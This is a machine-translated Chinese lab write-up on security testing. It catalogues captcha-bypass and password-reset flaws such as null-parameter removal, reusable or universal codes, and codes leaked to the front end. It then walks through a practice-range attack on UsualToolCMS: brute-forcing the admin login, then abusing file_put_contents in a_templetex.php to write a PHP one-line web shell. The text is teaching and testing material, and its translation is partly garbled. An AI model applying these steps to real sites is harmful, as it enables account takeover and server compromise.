Ask how lazy a girl can be, and she will not finish the homework of the first seven chapters in one go until the end, usually procrastinating as long as she can, and rushing to make up the shooting range until she needs SRC.
Verification code function:
CAPTCHA is the abbreviation of "Completely Automated Public Turing test to tell Computers and Humans Apart" (Turing Test to Tell Computers and Humans Apart), which is a public fully automatic program to distinguish whether the user is a computer or a human.
It can prevent: malicious cracking of passwords, swiping tickets, flooding forums, effectively preventing a hacker from making continuous login attempts to a specific registered user with a specific program brute force cracking method. In fact, using verification codes is a common way for many websites now. We use A relatively simple way to achieve this function.
Common postures for verification code bypass:
1. Front-end verification verification code, and no back-end verification. Capture the packet directly and then run the data packet. Anyway, is there any obstacle of the verification code?
2. The verification code is set but it doesn’t work, and you can log in successfully even if you enter the verification code randomly (it’s estimated that the boss didn’t pay the development salary)
3. The verification code can be reused. For example, the current verification code is 1111. Although the verification code will change after you fail to log in, but if you enter 1111, it will determine that your verification code is correct (common) http://wy.zone.ci/ bug_detail.php?wybug_id=wooyun-2016-0169672
4. Bypass the null value of the verification code. For example, we grab a package now and find that the login parameter is user=admin&password=admin&yzm=4123. The yzm verification code parameter, but if we remove the yzm parameter, we can bypass the verification code mechanism and directly pass the parameter user=admin&password=admin, and the verification code will become invalid http://wy.zone.ci/bug_detail.php? wybug_id=wooyun-2015-0155066
5. The interference of the verification code is too low, and it is easy to use the script to identify http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0194576
Six: The verification code will be output on the HTML page. http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0146767
7. The verification code can be controlled. For example, his verification code is included in the URL, which is a URL parameter. We can set the URL, so the verification code can be controlled http://wy.zone.ci/bug_detail.php?wybug_id =wooyun-2014-071289
8. The verification code has rules, such as the last 6 digits of the timestamp (the rand function performs random numbers)
Nine, there is a universal verification code, no matter what the verification code is, just enter 000000 to bypass it directly
10. Sometimes the verification code will be hidden in the cookie. Analyze whether there are parameters of the verification code. 11. There are too few types of picture verification codes, so it is easy to identify http://wy.zone.ci/bug_detail.php? wybug_id=wooyun-2015-0102178 Verification code bypass occurs after multiple logins: Based on session: http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0114450 Based on ip: http://wy .zone.ci/bug_detail.php?wybug_id=wooyun-2014-080327 based on user: brute force username instead of brute force password
Password Recovery Vulnerability
1. After the verification code is sent, the front end returns (http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0114577)
2. The verification code can be blasted without limit (http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0155994)
3. The verification code is controllable (http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086716)
4. Directly modify the password page (http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-040908)
5. Unauthorized Vulnerability --> Change the verification code by yourself and then modify their password
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0102205 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-016896
There are two types of verification codes:
- The verification code is a public automatic program that distinguishes whether the user is a computer or a human (for example, to be filled in when logging in)
- Identification, such as SMS verification code, phone verification code, email verification code.
What are the verification codes?
There are Chinese characters, pure numbers, click characters, mathematical operations, moving blocks and so on.
What does the verification code do
It can prevent malicious cracking of passwords, swiping tickets, flooding forums, and effectively prevent hackers from making continuous login attempts to a specific registered user with a specific program brute force cracking method. In fact, using verification codes is a common way for many websites now. We use a relatively simple way to achieve this function
Is the verification code reliable?
It is not necessarily reliable. If there is a logical loophole in the verification code when writing the code, it is easier to bypass. Even if there is no logical loophole, if the picture confusion of the verification code is relatively simple, you can write a script to automatically identify it (python has it)
Common Security Questions for Captchas
1. Front-end verification verification code, and no back-end verification
2. The verification code is set but not valid
3. The verification code can be reused
4. Null value bypass
5. The verification code can be controlled
6. The verification code has rules
Seven. There is a universal verification code
Eight. The verification code is placed in the cookie parameter
How to bypass the front-end verification code
Capture packets directly, because there is no verification on the backend
What are the general rules for verification codes?
There are many kinds, not necessarily, it depends on how the code is written, and the rand function is often used to generate random numbers
What is the Universal Verification Code?
Usually 000000 or 888888
What is the bypass of the verification code null value?
Remove the verification code parameter in the data packet, and found that the parameter passing mechanism has been bypassed. If you do not pass this parameter, then you will not enter the verification code verification process
What is the verification code controllable?
The verification code may exist in the url pass parameter, the url setting is fixed, and the verification code is controllable
How to find the verification code in the cookie parameter
Check if there is a corresponding value in the cookie parameter (verification code or corresponding parameter name)
Is the verification code time-sensitive?
Generally speaking, it will be time-sensitive, usually 30 minutes
What are the ways to retrieve the password?
1. Send reset link or number|string verification code via email
2. Send verification code via SMS
What are the general security issues with password retrieval?
1. The verification code is sent and returned by the front end
2. There is no limit to the number of times the verification code can be entered
3. The verification code is controllable
4. Directly visit the password modification page and find that it can be changed directly (lack of identity authentication)
5. Violation of authority (the verification code of one's own mobile phone has been changed by someone else's password)
6. There are flaws in the password protection problem
How to use the front-end return
View the returned data packet (you can use a browser or a packet capture tool)
What are the dangers of controllable verification codes?
Can send spam, phishing website links, bad website links
What is the situation of directly changing the password page
Generally, you can continue to access the password modification page after the verification fails.
What is missing authentication?
Lack of corresponding user ID and information verification, you can use your mobile phone number to bind other people's accounts
what is ultra vires
Through your own verification code, change the package, to change other people's password
The difference between ultra vires and lack of authentication
Parallel unauthorized access needs to be used after login, but lack of identity authentication does not
What are the pitfalls of password-protected questions?
- easy to guess
- The answer appears in js
How to Guess the Answer to Someone's Password-Protected Question
Through the analysis of clues, then call available resources and go to social workers.
Will the verification code be encrypted in the cookie?
yes, probably encrypted via md5 or something
What are the general generation rules for verification verification codes?
It is possible to generate the user's username, password, login time, etc. You can change the password, so that you can try to blast it, first pick one up to see the rules)
Let's enter the shooting range to see the specific operation! ! !
Obviously see the usualtoolcms
Go to the website to find the source code of usualtoolcms
download can see
Find its background login address. cmsadmin/a_login.php
Then go to the shooting range, go find the backstage
Try common weak passwords to enter, and find that the account number and password do not exist
Use Burp for packet capture analysis
On the premise that the verification code does not change, changing the password can be resent, and the page sent back is that the account and password do not match
Then it can be blasted
Blow out the password of the admin account as root
Successfully logged into its background
After entering the background, I found that there is nothing to use
Then perform a code audit on the found source code
Found the file_put_content() function in a_templetex.php.
And it accepts post parameters
(1)这里file_put_contents()是写文件
(2)函数里面的$filenames是文件名,$contents是文件内容
(3)上面看到传给的都是POST传参
(4)那么我们只要在检测sqlcheck的get传参x=m条件成立下
(5)在$filenames里面传个文件名,在$contents里面传个一句话木马那我们是不是就可以拿到shell了
First you need to visit whether a_templetex.php exists
Burp captures the packet, changes it to POST, adds ?x=m, writes the file name filename below, and writes the content of the file into the php one-word Trojan horse
lThe connection is successful
